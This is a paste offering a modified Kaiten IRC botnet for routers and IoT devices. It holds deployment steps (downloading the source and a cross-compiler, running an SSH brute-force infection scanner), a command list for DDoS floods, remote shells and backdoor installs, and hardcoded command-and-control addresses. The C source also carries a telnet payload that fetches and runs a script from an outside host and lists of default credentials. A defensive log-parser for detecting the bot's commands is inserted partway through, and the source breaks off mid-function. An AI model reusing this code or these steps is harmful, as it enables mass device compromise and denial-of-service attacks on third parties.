- qbot and mirai sucked, so here's kaiten v 6.6.6 will infect jillions of routers.
- To setup kaiten, follow the instructions
- Every line starting with a "-" is a command you enter in terminal
- Download kaiten.c from http://pastebin.com/7Spas23P
- -wget http://pastebin.com/raw/7Spas23P -O kaiten.c
- Next edit the file and change the settings to your IRC server, channel, and channel key.
- -nano kaiten.c
- scanner and bot modified by SynthMesc/Freak :D
- kaiten.c (I didn't create kaiten)
- Cross compile it to sh4, powerpc, mipsel, mips, and armv5l.
- Use this cross compiler (coded by yours truly): http://pastebin.com/87q15NWF
- -wget http://pastebin.com/raw/87q15NWF -O cc7.py
- -python cc7.py kaiten.c 0.0.0.0
- Where 0.0.0.0 is your servers IP
- Put the files in your htdocs or html directory of a server to host them.
- Next download the scanner
- -wget http://pastebin.com/raw/wTbbzSBV -O infect.py
- Remember to edit the wget line in the scanner (CTRL + F "bin.sh")
- Next install the dependencies
- -yum install python-paramiko
- Or
- -apt-get install python-paramiko
- Set some stuff on your servers so you don't get capped at 476 open SSH connections.
- -ulimit -n 99999
- -sysctl -w fs.file-max=100000
- Run heavyhidra
- -python infect.py 376 LUCKY x 0
- -python infect.py 376 B 113.53 1
- -python infect.py 376 ALL x lol
- Donate BTC: 1GbiMJNg9VLcMQp3eTdZo4URxE8X4Je7wJ
- /*******************************************************************************
- * This is a remake of Kaiten, hacked together from various versions scattered *
- * throughout cyberspace. New features include a variety of awesome shell one- *
- * liners, ability to upgrade the bot over http (via gcc or static binary), a *
- * feature called "HackPkg" that installs binaries without dependencies like *
- * wget or tftp, and more! Tip: run GETBB <tftp ip> first to get the most out *
- * of this bot (it will install to /var/bin, which is almost always writable). *
- * The LOCKUP command will kill telnetd and run a backdoor of your choice (for *
- * simplicity we assume you will run it on port 23). This bot is updated often,*
- * so check back frequently for new killer features and ddos tools. In memory *
- * of David Bowie, because he was an awesome musician and passed during the *
- * early development of this bot. By ShellzRuS and all the other developers *
- * that have worked on Kaiten over the last 20 years. *
- * *
- * "Hacking on kaiten is a right of passage" --Kod *
- *******************************************************************************
- * This is a IRC based distributed denial of service client. It connects to *
- * the server specified below and accepts commands via the channel specified. *
- * The syntax is: *
- * !<nick> <command> *
- * You send this message to the channel that is defined later in this code. *
- * Where <nick> is the nickname of the client (which can include wildcards) *
- * and the command is the command that should be sent. For example, if you *
- * want to tell all the clients with the nickname starting with N, to send you *
- * the help message, you type in the channel: *
- * !N* HELP *
- * That will send you a list of all the commands. You can also specify an *
- * astrick alone to make all client do a specific command: *
- * !* SH uname -a *
- * There are a number of commands that can be sent to the client: *
- * PAN <target> <port> <secs> = A SYN flooder *
- * TCP <target> <port> <time> <flags> <packetsize> <pollinterval> = A spoofed TCP flooder
- * STD <ip> <port> <time>. = A STD flooder *
- * UDP <target> <port> <secs> = An UDP flooder *
- * UNKNOWN <target> <secs> = Another non-spoof udp flooder *
- * HTTPFLOOD <url> <secs> = A HTTP flooder *
- * NTP <target> <ntp server> <secs> = an NTP dos flooder *
- * BLACKNURSE <target ip> <secs> = An ICMP flooder that will crash most firewalls
- * DNSAMP <IP> <port> <reflection file url> <threads> <time> = DNS amplification flooder
- * QUAKE3 <target IP> <target port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time> = A quake3 amplification flooder
- *
- * PROXYFLUX = Starts a TCP proxy tunnel to main server using netcat
- *
- * NICK <nick> = Changes the nick of the client *
- * SERVER <server> = Changes servers *
- * GETSPOOFS = Gets the current spoofing *
- * SPOOFS <subnet> = Changes spoofing to a subnet *
- * DISABLE = Disables all packeting from this bot *
- * ENABLE = Enables all packeting from this bot *
- * KILL = Kills the knight *
- * GET <http address> <save as> = Downloads a file off the web *
- * VERSION = Requests version of knight *
- * KILLALL = Kills all current packeting *
- * HELP = Displays this *
- * IRC <command> = Sends this command to the server *
- * SH <command> = Executes a command *
- * BASH <command> = Run a bash command *
- * ISH <command> = Interactive SH (via privmsg) *
- * SHD <command> = Daemonize command *
- * UPDATE <http://server/bot> = Update this bot *
- * HACKPKG <http://server/bin> = Install binary (no dependencies) *
- * INSTALL <http://server/bin> = Install binary (via wget) *
- * BINUPDATE <http://server/bin> = Update a binary (via wget) *
- * SCAN <nmap opts> = Call an nmap wrapper script *
- * GETSSH <http:serverdropbear> = Install dropbear, run on port 30022 *
- * RSHELL <ip port> = Equates to nohup nc ip port *
- * GETBB <tftp server> = Get a proper busybox (via tftp) *
- * LOCKUP <http://server/bin> = Kill telnet, install a backdoor! *
- * *
- * Remember, all these commands must be prefixed by a ! and the nickname that *
- * you want the command to be sent to (can include wildcards). There are no *
- * spaces in between the ! and the nickname, and there are no spaces before *
- * the ! *
- * *
- * - contem on efnet - Shellz&Kod&Freak/SynthMesc *
- *******************************************************************************/
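The header comment above documents the bot's control grammar: a channel message of the form `!<nick> <command>`, where the nick may contain wildcards. The following is an added detection example for defenders, not code from this paste or its authors. It scans captured IRC lines for that grammar using the command names from the HELP list and resolves which known bot nicknames a command addressed. The sample log lines, nicknames and host addresses are constructed, and case-insensitive command matching is an assumption.

```python
import re
from typing import Dict, Iterable, List, NamedTuple, Optional

# Command names copied from the HELP list in the source header on this page,
# grouped by what an incident responder needs to triage first.
COMMANDS = {
    "flood": {"PAN", "TCP", "STD", "UDP", "UNKNOWN", "HTTPFLOOD", "NTP",
              "BLACKNURSE", "DNSAMP", "QUAKE3"},
    "exec": {"SH", "BASH", "ISH", "SHD", "RSHELL", "SCAN"},
    "install": {"GET", "UPDATE", "HACKPKG", "INSTALL", "BINUPDATE",
                "GETSSH", "GETBB", "LOCKUP"},
    "control": {"NICK", "SERVER", "GETSPOOFS", "SPOOFS", "DISABLE", "ENABLE",
                "KILL", "KILLALL", "VERSION", "HELP", "IRC", "PROXYFLUX"},
}
CATEGORY = {name: cat for cat, names in COMMANDS.items() for name in names}

# ":<source> PRIVMSG <target> :!<nickpattern> <COMMAND> [args]"
# The header states there is no space before "!" or between "!" and the nick,
# so the pattern requires ":!" followed directly by a non-space run.
LINE_RE = re.compile(
    r"^(?::(?P<src>\S+)\s+)?PRIVMSG\s+(?P<target>\S+)\s+:"
    r"!(?P<nick>\S+)\s+(?P<cmd>[A-Za-z0-9]+)(?:\s+(?P<args>.*))?$"
)


class Hit(NamedTuple):
    source: Optional[str]
    target: str
    nick_pattern: str
    command: str
    category: str
    args: str


def parse_line(line: str) -> Optional[Hit]:
    """Return a Hit if the IRC line carries a command from the HELP list."""
    m = LINE_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    cmd = m.group("cmd").upper()  # assumption: commands match case-insensitively
    cat = CATEGORY.get(cmd)
    if cat is None:
        return None  # ordinary chat that merely starts with "!"
    return Hit(m.group("src"), m.group("target"), m.group("nick"),
               cmd, cat, m.group("args") or "")


def nick_matches(pattern: str, nick: str) -> bool:
    """Wildcard match with '*' and '?' only, ignoring case."""
    rx = "".join(".*" if ch == "*" else "." if ch == "?" else re.escape(ch)
                 for ch in pattern)
    return re.fullmatch(rx, nick, re.IGNORECASE) is not None


def addressed_hosts(hit: Hit, nick_to_host: Dict[str, str]) -> List[str]:
    """Hosts whose observed bot nickname the command's pattern selects."""
    return sorted(host for nick, host in nick_to_host.items()
                  if nick_matches(hit.nick_pattern, nick))


def scan(lines: Iterable[str]) -> List[Hit]:
    return [hit for hit in map(parse_line, lines) if hit is not None]


# Constructed sample data (documentation and private address ranges).
SAMPLE_LOG = [
    ":op!u@203.0.113.7 PRIVMSG #example :!* SH uname -a",
    ":op!u@203.0.113.7 PRIVMSG #example :!N* HELP",
    ":alice!a@198.51.100.4 PRIVMSG #example :!help with my router please",
    ":op!u@203.0.113.7 PRIVMSG #example : !* KILL",
    ":op!u@203.0.113.7 PRIVMSG #example :!NIX?A UDP 192.0.2.10 80 30",
    "PING :irc.example.net",
]
SAMPLE_NICKS = {"NIXZA": "10.0.0.5", "NODE7": "10.0.0.9", "cam3": "10.0.0.12"}

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit.category, hit.command, hit.nick_pattern,
              addressed_hosts(hit, SAMPLE_NICKS))
```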
- ////////////////////////////////////////////////////////////////////////////////
- // EDIT THESE //
- ////////////////////////////////////////////////////////////////////////////////
- #undef STARTUP // Start on startup?
- #undef IDENT // Only enable this if you absolutely have to
- #define FAKENAME "-bash" // What you want this to hide as
- #define CHAN "#tac0b3ll" // Channel to join
- #define KEY "swigityswag" // The key of the channel
- #define PREFIX "NiXnEt" // The NICK prefix
- #define SERVER_ADDR "64.137.205.150" //Fast-flux server address
- #define PROXY_PORT "6667" //Proxy port for fast-flux
- int numservers=1; // Must change this to equal number of servers down there
- char *servers[] = { // List the servers in that format, always end in (void*)0
- "update-server.dynu.net",
- (void*)0
- };
- ////////////////////////////////////////////////////////////////////////////////
- // STOP HERE! //
- ////////////////////////////////////////////////////////////////////////////////
- #include <stdarg.h>
- #include <errno.h>
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- #include <sys/types.h>
- #include <sys/stat.h>
- #include <fcntl.h>
- #include <strings.h>
- #include <netinet/in.h>
- #include <unistd.h>
- #include <sys/time.h>
- #include <sys/socket.h>
- #include <signal.h>
- #include <arpa/inet.h>
- #include <netdb.h>
- #include <time.h>
- #include <sys/wait.h>
- #include <sys/ioctl.h>
- #include <poll.h>
- #include <stdint.h>
- #include <pthread.h>
- #include <netinet/ip.h>
- #include <netinet/udp.h>
- #include <dirent.h>
- #include <net/if.h>
- #define MAX_PACKET_SIZE 8192
- #define PHI 0x9e3779b9
- #define PACKETS_PER_RESOLVER 25
- #define CMD_IAC 255
- #define CMD_WILL 251
- #define CMD_WONT 252
- #define CMD_DO 253
- #define CMD_DONT 254
- #define PAD_RIGHT 1
- #define PAD_ZERO 2
- #define PRINT_BUF_LEN 12
- #define OPT_SGA 3
- #define SOCKBUF_SIZE 1024
- #define NUMITEMS(x) (sizeof(x) / sizeof((x)[0]))
- char *Telnet_Payload = "cd /tmp; rm *; wget http://browsersecurity.gq/update/bins.sh; chmod +x bins.sh; sh bins.sh; rm -f bins.sh\r\n\0";
- char *Bot_Killer_Binarys[] = {
- "mips",
- "mips64",
- "mipsel",
- "sh2eb",
- "sh2elf",
- "sh4",
- "x86",
- "arm",
- "armv5",
- "armv4tl",
- "armv4",
- "armv6",
- "i686",
- "powerpc",
- "powerpc440fp",
- "i586",
- "m68k",
- "sparc",
- "x86_64",
- "jackmymips",
- "jackmymips64",
- "jackmymipsel",
- "jackmysh2eb",
- "jackmysh2elf",
- "jackmysh4",
- "jackmyx86",
- "jackmyarmv5",
- "jackmyarmv4tl",
- "jackmyarmv4",
- "jackmyarmv6",
- "jackmyi686",
- "jackmypowerpc",
- "jackmypowerpc440fp",
- "jackmyi586",
- "jackmym68k",
- "jackmysparc",
- "jackmyx86_64",
- "hackmymips",
- "hackmymips64",
- "hackmymipsel",
- "hackmysh2eb",
- "hackmysh2elf",
- "hackmysh4",
- "hackmyx86",
- "hackmyarmv5",
- "hackmyarmv4tl",
- "hackmyarmv4",
- "hackmyarmv6",
- "hackmyi686",
- "hackmypowerpc",
- "hackmypowerpc440fp",
- "hackmyi586",
- "hackmym68k",
- "hackmysparc",
- "hackmyx86_64",
- "b1",
- "b2",
- "b3",
- "b4",
- "b5",
- "b6",
- "b7",
- "b8",
- "b9",
- "b10",
- "b11",
- "b12",
- "b13",
- "b14",
- "b15",
- "b16",
- "b17",
- "b18",
- "b19",
- "b20",
- "busyboxterrorist",
- "DFhxdhdf",
- "dvrHelper",
- "FDFDHFC",
- "FEUB",
- "FTUdftui",
- "GHfjfgvj",
- "jhUOH",
- "JIPJIPJj",
- "JIPJuipjh",
- "kmymips",
- "kmymips64",
- "kmymipsel",
- "kmysh2eb",
- "kmysh2elf",
- "kmysh4",
- "kmyx86",
- "kmyarmv5",
- "kmyarmv4tl",
- "kmyarmv4",
- "kmyarmv6",
- "kmyi686",
- "kmypowerpc",
- "kmypowerpc440fp",
- "kmyi586",
- "kmym68k",
- "kmysparc",
- "kmyx86_64",
- "lolmips",
- "lolmips64",
- "lolmipsel",
- "lolsh2eb",
- "lolsh2elf",
- "lolsh4",
- "lolx86",
- "lolarmv5",
- "lolarmv4tl",
- "lolarmv4",
- "lolarmv6",
- "loli686",
- "lolpowerpc",
- "lolpowerpc440fp",
- "loli586",
- "lolm68k",
- "lolsparc",
- "RYrydry",
- "telmips",
- "telmips64",
- "telmipsel",
- "telsh2eb",
- "telsh2elf",
- "telsh4",
- "telx86",
- "telarmv5",
- "telarmv4tl",
- "telarmv4",
- "telarmv6",
- "teli686",
- "telpowerpc",
- "telpowerpc440fp",
- "teli586",
- "telm68k",
- "telsparc",
- "telx86_64",
- "TwoFacemips",
- "TwoFacemips64",
- "TwoFacemipsel",
- "TwoFacesh2eb",
- "TwoFacesh2elf",
- "TwoFacesh4",
- "TwoFacex86",
- "TwoFacearmv5",
- "TwoFacearmv4tl",
- "TwoFacearmv4",
- "TwoFacearmv6",
- "TwoFacei686",
- "TwoFacepowerpc",
- "TwoFacepowerpc440fp",
- "TwoFacei586",
- "TwoFacem68k",
- "TwoFacesparc",
- "TwoFacex86_64",
- "UYyuyioy",
- "x86_64",
- "XDzdfxzf",
- "xxb1",
- "xxb2",
- "xxb3",
- "xxb4",
- "xxb5",
- "xxb6",
- "xxb7",
- "xxb8",
- "xxb9",
- "xxb10",
- "xxb11",
- "xxb12",
- "xxb13",
- "xxb14",
- "xxb15",
- "xxb16",
- "xxb17",
- "xxb18",
- "xxb19",
- "xxb20",
- "1",
- "2",
- "3",
- "4",
- "5",
- "6",
- "7",
- "8",
- "9",
- "10",
- "11",
- "12",
- "13",
- "14",
- "15",
- "16",
- "17",
- "18",
- "19",
- "20",
- "bb",
- "busybotnet",
- "pppd",
- "pppoe",
- "wput",
- "B1",
- "B2",
- "B3",
- "B4",
- "B5",
- "B6",
- "B7",
- "B8",
- "B9",
- "B10",
- "B11",
- "B12",
- "B13",
- "B14",
- "B15",
- "B16",
- "B17",
- "B18",
- "B20"
- };
- char *useragents[] = {
- "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
- "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
- "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
- "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
- "Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
- "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
- "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
- "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
- "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
- "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
- "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1",
- "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
- "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
- "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
- "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6",
- "Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
- "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
- "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
- "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
- "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1",
- "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
- "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02",
- "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60",
- "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
- "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
- "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
- "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)",
- "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
- "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
- "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
- "Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
- "Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0",
- "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
- "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0",
- "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)",
- "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1",
- "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4",
- "Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
- "Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
- };
- char *Telnet_Usernames[] = {
- "telnet\0", //telnet:telnet
- "root\0", //root:root
- "admin\0", //admin:toor
- "user\0", //user:admin
- "login\0", //login:user
- "guest\0", //guest:guest
- "support\0" //support:login
- "root\0", //root:netgear1
- "root\0", //root:maxided
- "CISCO\0", //CISCO:CISCO
- "oracle\0", //oracle:oracle
- "tim\0", //tim:tim
- };
- char *Telnet_Passwords[] = {
- "telnet\0", //telnet:telnet
- "root\0", //root:root
- "toor\0", //admin:toor
- "admin\0", //user:admin
- "user\0", //login:user
- "guest\0", //guest:guest
- "login\0", //support:login
- "changeme\0", //(none):changeme
- "1234\0", //(none):1234
- "12345\0", //(none):12345
- "123456\0", //(none):123456
- "default\0", //(none):default
- "pass\0", //(none):pass
- "password\0", //(none):password
- "support\0", //(none):support
- "\0" //(none):(none)
- "maxided\0" //root:maxided
- "oracle\0", //oracle:oracle
- "tim\0", //tim:tim
- };
- char* advances[] = {":", "user", "ogin", "name", "pass", "dvrdvs", (char*)0};
- char* fails[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", (char*)0};
- char* successes[] = {"busybox", "$", "#", "shell", "dvrdvs", (char*)0};
- char* advances2[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "busybox", "$", "#", (char*)0};
- struct telstate_t {
- int fd;
- unsigned int ip;
- unsigned char state;
- unsigned char complete;
- unsigned char usernameInd; /* username */
- unsigned char passwordInd; /* password */
- unsigned char tempDirInd; /* tempdir */
- unsigned int tTimeout; /* totalTimeout */
- unsigned short bufUsed;
- char *sockbuf;
- };
- extern int scanPid = 0;
- int sock,changeservers=0;
- int *pids, csum=0, actualparent;
- char *server, *chan, *key, *nick, *ident, *user, disabled=0, execfile[256],dispass[256];
- //unsigned int *pids;
- unsigned long spoofs=0, spoofsm=0, numpids=0;
- char *getBuild() { //get architecture
- #if defined(__x86_64__) || defined(_M_X64)
- return "x86_64";
- #elif defined(__i386) || defined(_M_IX86)
- return "x86_32";
- #elif defined(__ARM_ARCH_4T__) || defined(__TARGET_ARM_4T)
- return "ARM-4";
- #elif defined(__ARM_ARCH_5_) || defined(__ARM_ARCH_5E_)
- return "ARM-5"
- #elif defined(__ARM_ARCH_6_) || defined(__ARM_ARCH_6T2_)
- return "ARM-6";
- #elif defined(_mips__mips) || defined(__mips) || defined(__MIPS_) || defined(_mips)
- return "MIPS";
- #elif defined(__sh__)
- return "SUPERH";
- #elif defined(__powerpc) || defined(__powerpc_) || defined(_ppc_) || defined(__PPC__) || defined(_ARCH_PPC)
- return "POWERPC";
- #else
- return "UNKNOWN";
- #endif
- }
- // Calculates the checksum of the ip header.
- unsigned short ccsum(unsigned short *ptr,int nbytes)
- {
- register long sum;
- unsigned short oddbyte;
- register short answer;
- sum=0;
- while(nbytes>1) {
- sum+=*ptr++;
- nbytes-=2;
- }
- if(nbytes==1) {
- oddbyte=0;
- *((u_char*)&oddbyte)=*(u_char*)ptr;
- sum+=oddbyte;
- }
- sum = (sum>>16)+(sum & 0xffff);
- sum = sum + (sum>>16);
- answer=(short)~sum;
- return(answer);
- }
- int strwildmatch(const char* pattern, const char* string) {
- switch(*pattern) {
- case '\0': return *string;
- case '*': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
- case '?': return !(*string && !strwildmatch(pattern+1, string+1));
- default: return !((toupper(*pattern) == toupper(*string)) && !strwildmatch(pattern+1, string+1));
- }
- }
- int Send(int sock, char *words, ...) {
- static char textBuffer[1024];
- va_list args;
- va_start(args, words);
- vsprintf(textBuffer, words, args);
- va_end(args);
- return write(sock,textBuffer,strlen(textBuffer));
- }
- int mfork(char *sender) {
- unsigned int parent, *newpids, i;
- if (disabled == 1) {
- Send(sock, "NOTICE %s :Unable to comply.\n", sender);
- return 1;
- }
- parent=fork();
- if (parent <= 0) return parent;
- numpids++;
- newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
- for (i=0;i<numpids-1;i++) newpids[i]=pids[i];
- newpids[numpids-1]=parent;
- free(pids);
- pids=newpids;
- return parent;
- }
- unsigned long getspoof() {
- if (!spoofs) return rand();
- if (spoofsm == 1) return ntohl(spoofs);
- return ntohl(spoofs+(rand() % spoofsm)+1);
- }
- void filter(char *a) { while(a[strlen(a)-1] == '\r' || a[strlen(a)-1] == '\n') a[strlen(a)-1]=0; }
- char *randstring(int length) {
- srand(time(NULL));
- char *charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
- size_t stringLen = 26*2+10+7;
- char *randomString;
- randomString = malloc(sizeof(char) * (length +1));
- if (!randomString) {
- return (char*)0;
- }
- unsigned int key = 0;
- for (int n = 0;n < length;n++) {
- key = rand() % stringLen;
- randomString[n] = charset[key];
- }
- randomString[length] = '\0';
- return randomString;
- }
- void identd() {
- int sockname,sockfd,sin_size,tmpsock,i;
- struct sockaddr_in my_addr,their_addr;
- char szBuffer[1024];
- if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) return;
- my_addr.sin_family = AF_INET;
- my_addr.sin_port = htons(113);
- my_addr.sin_addr.s_addr = INADDR_ANY;
- memset(&(my_addr.sin_zero), 0, 8);
- if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) return;
- if (listen(sockfd, 1) == -1) return;
- if (fork() == 0) return;
- sin_size = sizeof(struct sockaddr_in);
- if ((tmpsock = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) exit(0);
- for(;;) {
- fd_set bla;
- struct timeval timee;
- FD_ZERO(&bla);
- FD_SET(tmpsock,&bla);
- timee.tv_sec=timee.tv_usec=60;
- if (select(tmpsock + 1,&bla,(fd_set*)0,(fd_set*)0,&timee) < 0) exit(0);
- if (FD_ISSET(tmpsock,&bla)) break;
- }
- i = recv(tmpsock,szBuffer,1024,0);
- if (i <= 0 || i >= 20) exit(0);
- szBuffer[i]=0;
- if (szBuffer[i-1] == '\n' || szBuffer[i-1] == '\r') szBuffer[i-1]=0;
- if (szBuffer[i-2] == '\n' || szBuffer[i-2] == '\r') szBuffer[i-2]=0;
- Send(tmpsock, "%s : USERID : UNIX : %s\n",szBuffer,ident);
- close(tmpsock);
- close(sockfd);
- exit(0);
- }
- long pow(long a, long b) {
- if (b == 0) return 1;
- if (b == 1) return a;
- return a*pow(a,b-1);
- }
- u_short in_cksum(u_short *addr, int len) {
- register int nleft = len;
- register u_short *w = addr;
- register int sum = 0;
- u_short answer =0;
- while (nleft > 1) {
- sum += *w++;
- nleft -= 2;
- }
- if (nleft == 1) {
- *(u_char *)(&answer) = *(u_char *)w;
- sum += answer;
- }
- sum = (sum >> 16) + (sum & 0xffff);
- sum += (sum >> 16);
- answer = ~sum;
- return(answer);
- }
- void get(int sock, char *sender, int argc, char **argv) {
- int sock2,i,d;
- struct sockaddr_in server;
- unsigned long ipaddr;
- char buf[1024];
- FILE *file;
- unsigned char bufm[4096];
- if (mfork(sender) != 0) return;
- if (argc < 2) {
- Send(sock, "NOTICE %s :GET <host> <save as>\n", sender);
- exit(0);
- }
- if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
- Send(sock, "NOTICE %s :Unable to create socket.\n", sender);
- exit(0);
- }
- if (!strncmp(argv[1],"http://",7)) strcpy(buf,argv[1]+7);
- else strcpy(buf,argv[1]);
- for (i=0;i<strlen(buf) && buf[i] != '/';i++);
- buf[i]=0;
- server.sin_family = AF_INET;
- server.sin_port = htons(80);
- if ((ipaddr = inet_addr(buf)) == -1) {
- struct hostent *hostm;
- if ((hostm=gethostbyname(buf)) == NULL) {
- Send(sock, "NOTICE %s :Unable to resolve address.\n", sender);
- exit(0);
- }
- memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
- }
- else server.sin_addr.s_addr = ipaddr;
- memset(&(server.sin_zero), 0, 8);
- if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {
- Send(sock, "NOTICE %s :Unable to connect to http.\n", sender);
- exit(0);
- }
- Send(sock2,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",buf+i+1,buf);
- Send(sock, "NOTICE %s :Receiving file.\n", sender);
- file=fopen(argv[2],"wb");
- while(1) {
- int i;
- if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
- if (i < 4096) bufm[i]=0;
- for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
- for (d+=4;d<i;d++) fputc(bufm[d],file);
- goto done;
- }
- }
- done:
- Send(sock, "NOTICE %s :Saved as %s\n", sender,argv[2]);
- while(1) {
- int i,d;
- if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
- if (i < 4096) bufm[i]=0;
- for (d=0;d<i;d++) fputc(bufm[d],file);
- }
- fclose(file);
- close(sock2);
- exit(0);
- }
- void getspoofs(int sock, char *sender, int argc, char **argv) {
- unsigned long a=spoofs,b=spoofs+(spoofsm-1);
